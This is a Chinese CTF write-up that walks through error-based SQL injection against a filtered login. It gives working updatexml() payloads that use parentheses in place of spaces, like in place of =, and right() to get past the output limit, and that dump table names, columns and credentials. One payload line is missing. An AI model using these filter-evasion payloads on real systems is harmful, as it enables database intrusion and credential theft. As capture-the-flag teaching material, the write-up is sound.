看了大佬的wp,没用字典爆破,手动试出来的,屏蔽了常用的关键字,例如:order select union and 最搞的是,空格也有,这个空格后面让我看了好久,该在哪里加括号。
先传入1’ 1试试,发现提示报错:
其实这里提示了报错信息,就可以试一试报错注入了,当然这是事后诸葛亮,还是常规的注入试试,发现行不通。
这里就已经给屏蔽词才的差不多了,该进行报错注入了,使用:1'or(updatexml(1,concat(0x7e,database(),0x7e),1))#
报出数据库名:geek
然后这里是没用空格的,但是爆表的时候,发现不对劲,要加上空格,但是空格被屏蔽了,于是就更换()来进行:1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#
拿到表名:H4rDsq1
接着就是拿到列名:
1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#
注意这里等号也被屏蔽了,使用like进行替换。
拿到列名信息,接下来就是输出相关信息:
1'or(updatexml(1,concat(0x7e,(select(group_concat(username,'~',password))from(H4rDsq1)),0x7e),1))#
这里使用~来做一个填充,区别user列和pass列,然后得到信息:
拿到信息了,但是没拿完,拿了一半的flag,这是为什么?因为报错注入,最多显示32个字符,所以还要对后面的字符进行输出,但是这里又碰到substr关键字被屏蔽,也是。。。没办法,又看看大佬的wp,原来是用的right()突破字符限制,就是从字符串的最右边起,开始选字符。
例如:SELECT RIGHT('Hello, World', 5);
这将返回World。
所以接着的语句就是:
这里还有最后一点需要注意,就是在拼接的时候,不能想当然的把两个字符串拼接。要除去相同的部分:
'~flag~flag{93c21fdf-7e2b-4d48-ae'
'~b-4d48-ae6c-8abab092b920}~'
拼接后就是:flag{93c21fdf-7e2b-4d48-ae6c-8abab092b920}
这里的flag是动态的,别尝试用这个。
还可以用:^来更换or,然后不用updatexml(),而是使用:extractvalue()原理都是一样的。